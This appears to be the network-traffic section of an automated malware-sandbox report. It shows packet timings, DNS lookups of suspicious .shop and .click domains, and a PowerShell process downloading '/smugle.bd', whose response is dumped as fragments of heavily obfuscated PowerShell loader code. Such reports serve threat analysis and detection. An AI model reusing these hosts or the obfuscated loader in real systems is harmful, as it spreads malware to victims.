                                                                                                  Jan 6, 2025 13:56:35.839601994 CET49983443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:35.889301062 CET49983443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:35.889317036 CET44349983104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:36.810554981 CET49998443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:36.810587883 CET44349998104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:36.810681105 CET49998443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:36.810940981 CET49998443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:36.810951948 CET44349998104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:37.284979105 CET44349998104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:37.285043955 CET49998443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:37.286163092 CET49998443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:37.286170959 CET44349998104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:37.286391973 CET44349998104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:37.287915945 CET49998443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:37.288011074 CET49998443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:37.288038015 CET44349998104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:40.172864914 CET44349998104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:40.172970057 CET44349998104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:40.173017979 CET49998443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:40.173147917 CET49998443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:40.173163891 CET44349998104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:40.191029072 CET50014443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:40.191065073 CET44350014104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:40.191123962 CET50014443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:40.191381931 CET50014443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:40.191396952 CET44350014104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:40.665572882 CET44350014104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:40.665652990 CET50014443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:40.668190956 CET50014443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:40.668201923 CET44350014104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:40.668438911 CET44350014104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:40.671252012 CET50014443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:40.671333075 CET50014443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:40.671338081 CET44350014104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.044750929 CET44350014104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.044838905 CET44350014104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.044891119 CET50014443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.044981956 CET50014443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.045003891 CET44350014104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.395539045 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.395574093 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.395637035 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.396250010 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.396260977 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.878540993 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.878622055 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.880893946 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.880903959 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.881129026 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.884578943 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.885354042 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.885382891 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.885462046 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.885493994 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.885575056 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.885622978 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.886217117 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.886262894 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.890237093 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.890280962 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.894258022 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.894294024 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.894304991 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.894325018 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.894465923 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.894494057 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.894510031 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.897161007 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.897305965 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.897334099 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.897353888 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.897380114 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.897612095 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.897655964 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.911726952 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:41.914213896 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:41.914238930 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:43.474817038 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:43.474911928 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:43.474965096 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:43.475037098 CET50015443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:43.475058079 CET44350015104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:43.479105949 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:43.479140043 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:43.479217052 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:43.479463100 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:43.479475975 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:43.941838980 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:43.941915035 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:43.943275928 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:43.943289995 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:43.943527937 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:43.944649935 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:43.944673061 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:43.944710016 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.441005945 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.441093922 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.441148996 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:44.443243027 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:44.443264961 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.443275928 CET50016443192.168.2.4104.21.43.229
                                                                                                  Jan 6, 2025 13:56:44.443281889 CET44350016104.21.43.229192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.457003117 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:44.457031012 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.457093000 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:44.457393885 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:44.457410097 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.936407089 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.936487913 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:44.938929081 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:44.938936949 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.939189911 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.940351009 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:44.987318993 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.228764057 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.228809118 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.228847980 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.228859901 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.228880882 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.228915930 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.228919029 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.228928089 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.228967905 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.228975058 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.229239941 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.229269028 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.229285955 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.229294062 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.229337931 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.233635902 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.233681917 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.233716965 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.233725071 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.285666943 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.318890095 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319072962 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319127083 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.319139957 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319196939 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319238901 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.319247007 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319601059 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319633007 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319641113 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.319648981 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319685936 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.319693089 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319742918 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.319783926 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.322058916 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.322073936 CET44350017172.67.208.58192.168.2.4
                                                                                                  Jan 6, 2025 13:56:45.322098017 CET50017443192.168.2.4172.67.208.58
                                                                                                  Jan 6, 2025 13:56:45.322103024 CET44350017172.67.208.58192.168.2.4
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 6, 2025 13:55:17.982389927 CET6434853192.168.2.41.1.1.1
                                                                                                  Jan 6, 2025 13:55:17.992938995 CET53643481.1.1.1192.168.2.4
                                                                                                  Jan 6, 2025 13:56:30.446994066 CET5448953192.168.2.41.1.1.1
                                                                                                  Jan 6, 2025 13:56:30.468233109 CET53544891.1.1.1192.168.2.4
                                                                                                  Jan 6, 2025 13:56:44.445168972 CET5547753192.168.2.41.1.1.1
                                                                                                  Jan 6, 2025 13:56:44.454703093 CET53554771.1.1.1192.168.2.4
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 6, 2025 13:55:17.982389927 CET192.168.2.41.1.1.10x71d9Standard query (0)cabf.klipdesak.shopA (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:56:30.446994066 CET192.168.2.41.1.1.10x693bStandard query (0)quantitypitt.clickA (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:56:44.445168972 CET192.168.2.41.1.1.10xebcStandard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 6, 2025 13:55:17.992938995 CET1.1.1.1192.168.2.40x71d9No error (0)cabf.klipdesak.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:55:17.992938995 CET1.1.1.1192.168.2.40x71d9No error (0)cabf.klipdesak.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:55:17.992938995 CET1.1.1.1192.168.2.40x71d9No error (0)cabf.klipdesak.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:55:17.992938995 CET1.1.1.1192.168.2.40x71d9No error (0)cabf.klipdesak.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:55:17.992938995 CET1.1.1.1192.168.2.40x71d9No error (0)cabf.klipdesak.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:55:17.992938995 CET1.1.1.1192.168.2.40x71d9No error (0)cabf.klipdesak.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:55:17.992938995 CET1.1.1.1192.168.2.40x71d9No error (0)cabf.klipdesak.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:56:30.468233109 CET1.1.1.1192.168.2.40x693bNo error (0)quantitypitt.click104.21.43.229A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:56:30.468233109 CET1.1.1.1192.168.2.40x693bNo error (0)quantitypitt.click172.67.186.189A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:56:44.454703093 CET1.1.1.1192.168.2.40xebcNo error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                  Jan 6, 2025 13:56:44.454703093 CET1.1.1.1192.168.2.40xebcNo error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                  • cabf.klipdesak.shop
                                                                                                  • quantitypitt.click
                                                                                                  • klipvumisui.shop
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449741104.21.16.14434628C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:55:18 UTC78OUTGET /smugle.bd HTTP/1.1
                                                                                                  Host: cabf.klipdesak.shop
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-06 12:55:18 UTC990INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:55:18 GMT
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  Content-Length: 9411508
                                                                                                  Connection: close
                                                                                                  X-Powered-By: Express
                                                                                                  ETag: W/"8f9bb4-bg80oUC7N9Y47bf+c4JxQVKn0o0"
                                                                                                  Set-Cookie: connect.sid=s%3AfkDNPzKCgiZmatWWe0E7GCkaFQJ12jgZ.HWdOM%2F98FSA%2FPHmBV1XiAvUZ3SSZknV7ll24J1j0DLA; Path=/; HttpOnly
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKLKJATkpx6xyBRVm%2FxUdk1JXaUULdSTgZCkFq%2BLXjZ9%2BfmDBJLbXGylvPbrQ%2Fj5CrCdCRJaXFkiS%2F%2Fyjt1fyXkCLLnqIdq0GmW1YCUFwb5BRSA4PrbG3E8vscljEAesTOIdovEN"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbdc95dd871899-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1644&rtt_var=634&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=692&delivery_rate=1702623&cwnd=153&unsent_bytes=0&cid=cb76c132f31d378f&ts=519&x=0"
                                                                                                  2025-01-06 12:55:18 UTC379INData Raw: 24 4c 4e 77 56 41 53 79 41 70 73 35 64 36 47 6a 53 4a 50 35 78 47 4f 53 33 55 38 6f 57 71 74 4d 30 71 61 37 62 5a 68 49 73 30 70 49 59 79 47 73 48 73 71 61 70 37 35 44 76 36 50 47 47 73 54 37 6a 4c 51 4b 54 34 55 62 51 49 66 51 57 65 59 77 73 62 72 5a 4a 4c 78 6b 69 42 65 69 30 71 4a 77 36 78 66 4f 55 39 6b 59 79 42 4b 75 4e 43 56 34 6c 79 46 61 51 54 65 4d 50 74 78 57 6e 54 45 68 47 6a 59 43 49 41 6f 48 4f 42 57 75 57 6d 4f 39 33 77 54 44 39 32 49 31 35 73 7a 43 64 33 75 41 57 58 72 42 33 36 4c 67 32 74 61 65 74 43 78 61 32 6c 41 6a 30 36 51 49 57 78 49 6d 49 58 58 59 7a 31 30 38 36 67 78 73 62 6e 54 48 49 34 79 37 46 42 4f 54 75 32 56 4f 37 59 51 6c 4d 4c 55 30 52 30 55 67 46 37 66 6b 63 54 31 52 38 65 6d 69 66 65 63 6f 48 54 4a 4e 43 45 4e 51 51 48 52
                                                                                                  Data Ascii: $LNwVASyAps5d6GjSJP5xGOS3U8oWqtM0qa7bZhIs0pIYyGsHsqap75Dv6PGGsT7jLQKT4UbQIfQWeYwsbrZJLxkiBei0qJw6xfOU9kYyBKuNCV4lyFaQTeMPtxWnTEhGjYCIAoHOBWuWmO93wTD92I15szCd3uAWXrB36Lg2taetCxa2lAj06QIWxImIXXYz1086gxsbnTHI4y7FBOTu2VO7YQlMLU0R0UgF7fkcT1R8emifecoHTJNCENQQHR
                                                                                                  2025-01-06 12:55:18 UTC1369INData Raw: 47 62 62 78 30 38 65 4b 57 48 49 51 58 38 6e 54 54 79 65 74 51 4f 65 39 45 66 4e 49 78 46 50 62 4a 59 50 35 6d 56 43 33 5a 38 4a 43 67 35 66 6f 6b 63 69 63 30 48 58 32 53 36 53 6f 7a 34 6a 71 35 52 38 56 64 73 73 62 78 79 54 36 32 47 52 45 58 71 31 79 68 46 54 6a 41 69 39 65 70 32 4d 79 35 58 4e 36 4d 4b 67 6f 70 6b 49 4a 62 44 70 67 46 77 36 76 75 58 38 34 41 61 4f 36 6d 7a 58 44 37 47 6d 59 7a 42 36 51 59 68 4b 56 71 55 4f 65 70 71 4e 59 39 65 79 62 79 4f 38 45 33 74 50 68 46 69 6e 34 45 41 70 5a 78 69 4e 42 71 59 78 69 43 4e 4e 67 39 61 34 43 6c 74 38 6b 71 5a 4c 44 4f 6a 77 37 78 4d 72 4b 68 76 48 63 66 68 38 68 6f 57 6f 6f 61 59 20 3d 20 22 47 65 74 42 79 74 65 73 22 0d 0a 0d 0a 24 43 56 75 61 4c 68 4e 31 52 63 63 6e 4d 33 45 52 6c 30 53 61 64 55 44
                                                                                                  Data Ascii: Gbbx08eKWHIQX8nTTyetQOe9EfNIxFPbJYP5mVC3Z8JCg5fokcic0HX2S6Soz4jq5R8VdssbxyT62GREXq1yhFTjAi9ep2My5XN6MKgopkIJbDpgFw6vuX84AaO6mzXD7GmYzB6QYhKVqUOepqNY9eybyO8E3tPhFin4EApZxiNBqYxiCNNg9a4Clt8kqZLDOjw7xMrKhvHcfh8hoWooaY = "GetBytes"$CVuaLhN1RccnM3ERl0SadUD
                                                                                                  2025-01-06 12:55:18 UTC1369INData Raw: 30 37 58 4d 41 51 6d 34 6b 76 43 4a 34 50 76 30 58 73 65 56 41 6d 6b 49 64 4c 65 70 62 46 39 54 54 75 76 65 6f 79 35 55 38 62 64 50 72 6f 7a 79 33 73 6a 46 4e 47 62 62 78 30 38 65 4b 57 48 49 51 58 38 6e 54 54 79 65 74 51 4f 65 39 45 66 4e 49 78 46 50 62 4a 59 50 35 6d 56 43 33 5a 38 4a 43 67 35 66 6f 6b 63 69 63 30 48 58 32 53 36 53 6f 7a 34 6a 71 35 52 38 56 64 73 73 62 78 79 54 36 32 47 52 45 58 71 31 79 68 46 54 6a 41 69 39 65 70 32 4d 79 35 58 4e 36 4d 4b 67 6f 70 6b 49 4a 62 44 70 67 46 77 36 76 75 58 38 34 41 61 4f 36 6d 7a 58 44 37 47 6d 59 7a 42 36 51 59 68 4b 56 71 55 4f 65 70 71 4e 59 39 65 79 62 79 4f 38 45 33 74 50 68 46 69 6e 34 45 41 70 5a 78 69 4e 42 71 59 78 69 43 4e 4e 67 39 61 34 43 6c 74 38 6b 71 5a 4c 44 4f 6a 77 37 78 4d 72 4b 68 76
                                                                                                  Data Ascii: 07XMAQm4kvCJ4Pv0XseVAmkIdLepbF9TTuveoy5U8bdProzy3sjFNGbbx08eKWHIQX8nTTyetQOe9EfNIxFPbJYP5mVC3Z8JCg5fokcic0HX2S6Soz4jq5R8VdssbxyT62GREXq1yhFTjAi9ep2My5XN6MKgopkIJbDpgFw6vuX84AaO6mzXD7GmYzB6QYhKVqUOepqNY9eybyO8E3tPhFin4EApZxiNBqYxiCNNg9a4Clt8kqZLDOjw7xMrKhv
                                                                                                  2025-01-06 12:55:18 UTC1369INData Raw: 76 61 70 4a 29 20 2d 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 20 2a 20 36 30 35 39 30 29 20 2a 20 33 32 31 35 29 29 0d 0a 24 57 54 79 63 6a 62 51 4f 65 20 3d 20 28 28 28 28 28 38 33 33 20 2a 20 28 28 28 24 79 64 6f 54 57 6b 66 48 20 2d 20 2d 34 31 38 33 38 37 29 20 2a 20 2d 31 37 32 34 35 29 29 29 20 2a 20 32 37 29 20 2b 20 30 29 20 2b 20 28 28 28 28 28 24 57 54 79 63 6a 62 51 4f 65 20 2a 20 31 37 35 29 20 2b 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 20 2d 20 33 31 38 36 37 29 20 2a 20 24 72 52 48 76 77 6e 77 66 4b 70 52 29 29 29 20 2a 20 28 28 28 28 2d 38 33 33 20 2d 20 35 37 35 29 20 2b 20 24 57 54 79 63 6a 62 51 4f 65 29 20 2a 20 36 39 37 39 29 29 29 0d 0a 24 46 4b 75 76 62 58 5a 4f 45 76 5a 20 3d 20 28 28 2d 31 20 2b 20 28 28 28 24 57 54 79 63 6a 62 51 4f 65 20
                                                                                                  Data Ascii: vapJ) - $KVHojVRko) * 60590) * 3215))$WTycjbQOe = (((((833 * ((($ydoTWkfH - -418387) * -17245))) * 27) + 0) + ((((($WTycjbQOe * 175) + $KVHojVRko) - 31867) * $rRHvwnwfKpR))) * ((((-833 - 575) + $WTycjbQOe) * 6979)))$FKuvbXZOEvZ = ((-1 + ((($WTycjbQOe
                                                                                                  2025-01-06 12:55:18 UTC1369INData Raw: 64 6f 54 57 6b 66 48 20 2b 20 2d 38 30 33 29 20 2a 20 2d 32 34 35 30 29 29 29 29 20 2a 20 28 28 30 20 2d 20 33 33 36 30 31 29 20 2d 20 37 31 30 35 31 34 29 29 0d 0a 24 57 54 79 63 6a 62 51 4f 65 20 3d 20 28 28 28 28 28 2d 37 20 2b 20 28 28 28 28 28 28 24 61 4e 70 54 6e 63 6a 76 61 70 4a 20 2d 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 20 2a 20 34 32 32 29 20 2b 20 24 5a 6f 6d 77 5a 6f 29 29 20 2d 20 28 28 2d 37 34 20 2d 20 28 28 28 28 28 37 31 37 34 39 20 2a 20 32 31 29 20 2b 20 24 79 64 6f 54 57 6b 66 48 29 20 2a 20 24 59 51 55 69 6d 48 48 77 29 20 2b 20 39 38 31 31 29 29 29 20 2d 20 28 28 28 28 2d 37 33 20 2d 20 33 32 36 32 38 30 29 20 2a 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 20 2a 20 24 73 4f 65 4b 49 59 44 4b 71 65 59 29 29 29 29 29 29 20 2b 20 24 79 64 6f 54
                                                                                                  Data Ascii: doTWkfH + -803) * -2450)))) * ((0 - 33601) - 710514))$WTycjbQOe = (((((-7 + (((((($aNpTncjvapJ - $KVHojVRko) * 422) + $ZomwZo)) - ((-74 - (((((71749 * 21) + $ydoTWkfH) * $YQUimHHw) + 9811))) - ((((-73 - 326280) * $KVHojVRko) * $sOeKIYDKqeY)))))) + $ydoT
                                                                                                  2025-01-06 12:55:18 UTC1369INData Raw: 34 33 37 30 33 31 29 20 2d 20 24 47 67 6a 64 54 56 54 4e 50 63 29 29 29 29 29 20 2b 20 24 61 4e 70 54 6e 63 6a 76 61 70 4a 29 20 2b 20 28 28 28 28 28 28 24 6e 6e 73 6c 73 6c 42 53 67 20 2b 20 24 7a 43 49 55 6a 55 55 42 59 29 20 2a 20 37 39 31 30 31 29 20 2b 20 24 79 64 6f 54 57 6b 66 48 29 29 20 2b 20 28 28 28 28 34 37 20 2d 20 2d 33 39 37 36 29 20 2b 20 24 51 6f 66 70 6c 68 4e 66 29 20 2d 20 24 61 4e 70 54 6e 63 6a 76 61 70 4a 29 20 2a 20 24 73 4f 65 4b 49 59 44 4b 71 65 59 29 29 29 29 29 20 2a 20 28 28 28 28 28 28 28 38 20 2a 20 2d 31 31 34 39 34 29 20 2a 20 24 61 4e 70 54 6e 63 6a 76 61 70 4a 29 20 2a 20 33 33 30 38 29 20 2b 20 34 36 29 20 2a 20 28 28 28 28 28 24 4c 6b 56 48 53 56 73 46 6b 68 20 2a 20 24 4d 6c 4a 57 6a 72 59 70 29 20 2d 20 39 31 32 33
                                                                                                  Data Ascii: 437031) - $GgjdTVTNPc))))) + $aNpTncjvapJ) + (((((($nnslslBSg + $zCIUjUUBY) * 79101) + $ydoTWkfH)) + ((((47 - -3976) + $QofplhNf) - $aNpTncjvapJ) * $sOeKIYDKqeY))))) * (((((((8 * -11494) * $aNpTncjvapJ) * 3308) + 46) * ((((($LkVHSVsFkh * $MlJWjrYp) - 9123
